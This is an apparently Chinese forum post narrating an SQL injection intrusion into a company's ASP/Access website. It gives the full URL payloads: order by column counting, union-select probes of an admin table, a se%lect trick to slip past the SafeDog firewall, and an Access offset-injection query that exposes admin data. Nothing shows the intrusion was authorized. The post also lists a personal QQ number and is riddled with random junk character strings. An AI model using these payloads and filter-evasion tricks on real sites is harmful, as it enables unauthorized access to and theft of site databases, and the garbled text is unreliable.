打开网站,一个企业站。& k8 W/ f! ~/ @. |: [; z+ R
( S2 S8 `' i% }# n1 i8 ~* e4 w4 U/ j
顺手加个admin0 c1 a$ f) K: ?9 t! ^
/ Y' D( S ` ~" Y n6 @
# k$ J: H4 k0 B# S7 g
默认后台。: u; l4 ]3 f# E
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。! g! t1 U0 L6 M7 P6 Q8 x# h1 Q) G" c% ~2 z
5 G1 _! U, `0 P
: S8 a! f) v: f$ F" e( D; \' X) S. C$ H0 `( t* ^
所以就不用御剑扫了,待会直接封IP。3 S" @( t' c4 U
- A+ U1 w) V8 m8 q' h用order by语句判断是否存在注入。
; z' I1 ~% d/ l [% h; z$ E1 H- qhttp://www.xxx.com /product_show.asp?id=997 order by 1
* a4 o9 X3 l5 T. [0 Khttp://www.xxx.com /product_show.asp?id=997 order by 100' f" U3 l5 x9 W6 d7 A4 k
现在存在注入,经测试后发现是9个字段。
0 O4 N# ?8 j# Q7 x. P ^ ) k& `9 P* n) Z; D, y; N
接下来进行联合查询,猜是否存在admin表。: o2 E! a8 A" n$ S- @3 m. U7 q* I( q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
. ?$ F9 o; ~# F0 Q
! X* s/ S; H- R, C2 C$ j$ k& K
4 @, g7 S: r7 x
$ u) p0 z- ]4 `8 p# j+ p5 q8 F在select中间加个%,se%lect绕过安全狗。8 o1 I* D7 C2 O* f' R
' g+ }1 x0 n5 s8 ?' f9 [$ ?
9 I0 y2 V1 E4 } ^发现存在admin表,然后开始手工猜常用的字段。
7 Z3 q7 B" X" y) w纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。$ P6 k6 |/ |$ D( Y
! `0 _' \- h! }- v! D# ~7 e2 H- x突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
+ w( t+ k0 ^& ~5 t) N
! \$ J9 @8 {! }& t7 T" m. [科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。6 P) X. s- G& w! o+ w$ R
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
- M# u3 \# A ~ x, Z' X, h2 _% z; h好了,敏感内容出显了。* a1 @' S. ]2 b4 A* }. c# }
5 U+ k3 p* c9 a# Z( ?, C" _, a& S, F5 h9 ^- f. r5 o: o& j B
- C: T2 C2 `0 x+ _, m g8 [0 j
|